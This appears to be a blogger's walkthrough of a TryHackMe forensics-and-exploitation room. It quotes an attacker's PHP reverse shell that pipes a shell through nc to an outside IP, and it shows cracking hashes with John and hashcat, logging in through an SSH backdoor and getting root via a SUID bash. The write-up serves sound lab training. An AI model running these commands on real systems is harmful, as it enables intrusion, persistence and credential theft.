aldern00b

THM - Overpass 2 - Hacked


Overpass 2 - Looks like we're on the other end this time! If you didn't read my first part of this, you can find it here: https://www.aldern00b.com/post/thm-overpass


First things first, let's download the overpass 2 .pcap files and use WireShark to view 'em. Now, it's been a good solid minute since I've used WireShark so, bear with me here.


What was the URL of the page they used to upload a reverse shell?

I can see a POST right off the bat, and it's an upload.php file... sounds like this is it. Looking at the data, we can also see the name of the file is payload.php. The answer here would be


/development/


What payload did the attacker use to gain access?

Using this same line, we can dig down into the data and get what the payload was. After copying it to a notepad and cleaning it up a bit, this is what we see - a sneaky PHP reverse shell.


<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i2>&1|nc 192.168.170.145 4242 >/tmp/f")?>


What password did the attacker use to privesc?

I'm super lazy so I wanted to take this data and really filter it out to what I think I'm looking for. I did a right-click follow TCP Stream to bring up the full conversation on the first non-http TCP traffic I saw.



Doing this immediately showed me the password that was used, which is perfect - laziness triumphs!



How did the attacker establish persistence?

If we scroll down this conversation we can see that he pulled some git magic and installed an ssh-backdoor... I might have to go check that out later!



Using the fasttrack wordlist, how many of the system passwords were crackable?

Okay so this one, according to the hint, is to check the dump of the shadow file he did (right above that git clone command) and see how many passwords were crackable. It looks like there's only 5 with hashes, let's copy those out to a file and use John the Ripper. The fasttrack wordlist can be found under /usr/share/wordlists


The copy and paste is straight out of the text - no need to modify.



john --wordlist=/usr/share/wordlists/fasttrack.txt hashes

Unfortunately I forgot to include the wordlist on the first run and stopped it... either way, I got all 4 - which is the answer btw!



Whew... well that's the end of the first part - I think we need a quick break. Have you seen the episode of Family Guy, where he's trying to teach Quagmire how to use a PC?


Hilarious.



TASK 2

 

Alright, so now we gotta dig into the code a bit here. So we'll need to borrow his git clone command from the .pcap file we've been using and clone this down to the attack box.


git clone https://github.com/NinjaJc01/ssh-backdoor

Make it executable so we can do what we need


chmod +x backdoor

What's the default hash for the backdoor?

Let's first try looking at help to see how we can run some commands and maybe get that default hash.


./backdoor --help

Well, well. There's the answer right in front of us!



What's the hardcoded salt for the backdoor?

For this one we're going to want to


nano main.go

A function caught my attention, it was looking for the hash, salt and password to be provided to it.



Scrolling down, I see another function calling that function with the second variable hard coded - the salt!



What was the hash that the attacker used? - go back to the PCAP for this!

Going back to that PCAP file, we can see him using the -a switch, which, if we remember from the help switch, is the hash that's being used.



Crack the hash using rockyou and a cracking tool of your choice. What's the password?

Yay! More password cracking! I always need the practice so no complaints here! Rockyou.txt is found in the same wordlist directory we previously used. We'll copy that hash to a file on the attack box and pound it with John.


Now unfortunately, you can't just copy and paste that bad boy in there because there's a salt. Looking back at the code it looks like it will be password followed by salt. Now the hint says make sure to use the correct mode...


So... doing some (okay a lot) of Google research it looks like you can just put the hash and salt together in the file and they give examples how here: example_hashes [hashcat wiki]. Let's give it a go.


Using HashID I was able to determine it's an SHA-512, so using the above site I was able to determine how to put the file together.


I could NOT figure out how to get John to work for this... Google was telling me you have to create all these complex strings and I couldn't wrap my head around it, so I switched over to hashcat, which was MUCH simpler. I think I might start working with this cracker more. If you're wondering where the 1710 comes from, it's from that link above where it gave you the hash types.


hashcat -m 1710 hashes /usr/share/wordlists/rockyou.txt 
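To make the "password followed by salt" layout concrete, here is an added example (not part of the original post, and not the backdoor's own code) that builds and checks one hash:salt line in the form mode 1710 expects. The password and salt are constructed placeholders, and the function names are hypothetical.

```shell
#!/bin/sh
# Added example. PASSWORD and SALT below are constructed placeholders,
# not the values from the room or the backdoor source.

# SHA-512 over password followed by salt, hex encoded (hashcat mode 1710).
sha512_pass_salt() {
    printf '%s%s' "$1" "$2" | sha512sum | cut -d' ' -f1
}

# Same inputs, salt first: this is what mode 1720 would test instead.
sha512_salt_pass() {
    printf '%s%s' "$2" "$1" | sha512sum | cut -d' ' -f1
}

# One line of the hash file handed to "hashcat -m 1710": hash:salt
hashcat_1710_line() {
    printf '%s:%s\n' "$(sha512_pass_salt "$1" "$2")" "$2"
}

# check_candidate LINE WORD: succeeds when WORD hashes to LINE's digest.
# The digest is hex, so the first ':' always ends it; the salt may
# itself contain ':' and is taken as everything after that.
check_candidate() {
    digest=${1%%:*}
    salt=${1#*:}
    [ "$(sha512_pass_salt "$2" "$salt")" = "$digest" ]
}

PASSWORD='example-password'      # constructed
SALT='0123456789abcdef:demo'     # constructed, includes a ':' on purpose

line=$(hashcat_1710_line "$PASSWORD" "$SALT")
echo "hash file line: $line"
check_candidate "$line" "$PASSWORD" && echo "candidate matches"
check_candidate "$line" 'wrong-guess' || echo "wrong guess rejected"
```

Swapping the concatenation order gives a different digest, which is why picking the wrong mode finds nothing even with the right wordlist.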




TASK 3

 
The attacker defaced the website. What message did they leave as a heading?

Easy peasy, just visit the website.



Using the information you've found previously, hack your way back in!

Okay so looking at the Wireshark again, we can see that the ssh-backdoor was created but on a different port - port 2222



If we connect to that and use the new James password we found we should get in.


ssh james@[IP] -p 2222

What's the user flag?

If we back up a folder we'll see user.txt which will be our first flag. If we try and get to the root folder we see that fake James isn't an admin...



What's the root flag?

I took a minute to go through the list of usernames and passwords that we cracked previously and unfortunately, I got authentication errors on the passwords I got... which was interesting - guess he reset 'em. I checked for new users created, and also tried to run sudo as James but none of the passwords worked. Our previous cronjob is gone too!!


I kept looking at this .suid_bash hidden file... but I honestly had no idea what to do with it. After a long while, I had to look at someone else's walkthrough. I took a visit to https://niekdang.wordpress.com/2021/04/19/tryhackme-solution-overpass-2-hacked/ and he pointed to the same file I was looking at.



Running it by itself it does nothing and honestly, I wouldn't have thought about thinking it was the bash interpreter that has the SUID bit set. What ticked me off a bit was I didn't even think of checking SUID bits because we did that from the first hack and he didn't have anything special. This just goes to show, just like when I troubleshoot user issues: never assume - always re-check. SO let's walk through it like we SHOULD have.


find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

The above will list out all the files we see with the SUID bit set, we can see it there at the bottom.



Where this STILL would catch me is that I wouldn't have thought this was a bash interpreter - until I run it. Now that I know it's a bash interpreter we can use our GTFOBins site to see how to take advantage: bash | GTFOBins
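From the defender's side, the same search can name the interpreter for you. This is an added example, not part of the original post: it lists SUID/SGID files under a directory and flags any that are byte-for-byte copies of a shell. The function names, output labels and fallback shell list are assumptions.

```shell
#!/bin/sh
# Added example: audit a directory tree for SUID/SGID files that are
# byte-for-byte copies of a shell interpreter (e.g. a hidden .suid_bash).

# Reference interpreters to compare against. /etc/shells is used when
# readable; the fallback list is an assumption for minimal systems.
reference_shells() {
    if [ -r /etc/shells ]; then
        grep -v '^#' /etc/shells || true
    fi
    printf '%s\n' /bin/sh /bin/bash /bin/dash
}

# audit_suid_shells DIR
# Prints one line per SUID/SGID regular file under DIR:
#   SHELL-COPY <file> == <shell>   content identical to an interpreter
#   HIDDEN <file>                  dotfile that is not a shell copy
#   SUID <file>                    anything else, for manual review
audit_suid_shells() {
    dir=$1
    find "$dir" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        match=
        for s in $(reference_shells | sort -u); do
            if [ -f "$s" ] && cmp -s "$f" "$s"; then
                match=$s
                break
            fi
        done
        if [ -n "$match" ]; then
            printf 'SHELL-COPY %s == %s\n' "$f" "$match"
        else
            case ${f##*/} in
                .*) printf 'HIDDEN %s\n' "$f" ;;
                *)  printf 'SUID %s\n' "$f" ;;
            esac
        fi
    done
}

# Typical use: audit_suid_shells /home
```

A renamed copy still matches because the comparison is on file content, not on the name.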



When we run that file with the -p switch we get root



Pop down a few folders and we have our flag. Thanks so much Niek for the hand at the end there. I still have a lot to learn but this just shows - sharing is caring. The more you know, the more you grow lol








